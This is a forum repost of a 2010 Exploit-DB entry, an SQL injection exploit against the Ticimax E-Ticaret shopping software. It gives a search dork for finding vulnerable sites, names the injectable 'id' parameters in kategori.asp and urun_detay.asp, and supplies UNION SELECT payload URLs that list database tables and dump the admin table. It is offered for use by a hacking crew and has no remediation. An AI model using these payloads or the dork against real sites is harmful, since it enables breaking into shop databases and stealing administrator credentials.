- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12841
- Проверка EDB
-
- Пройдено
- Автор
- NEUROMANCER
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2010-06-01
Код:
# Exploit Title: [Ticimax E-Ticaret ( SQL Injection ) ]
# Date: [01.06.2010]
# Author: [Neuromancer]
# Version: [app version]
# CVE : [if exists]
# Code : [exploit code]
#####################
# Author: [Neuromancer]
# contact : msn[at]neurom4ncer[dot]com
# From : TURKEY
#####################
Ticimax e-ticaret ( Kategori.asp, urun_detay.aspLocal SQL Injection Vulnerability
Dork : "Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır"
======================================================================
--=[ Vuln C0de ]=-
[-] localhost/kategori.asp?id='
[-] localhost/urun_detay.asp?id='
http://[Site].com/kategori.asp?id=1 order by 1
http://[Site].com/kategori.asp?id=1 union select x,x,group_concat(table_name)+from+information.schema.tables
or
http://[Site].com/kategori.asp?id=1 union select * from admin
=========================| -=[ Attackerz Crew co. ]=- |=========================
Gr33t'z; h4cker.tr, by_fatih, by.kiki, TheNesa, RedMasTeR- Источник
- www.exploit-db.com
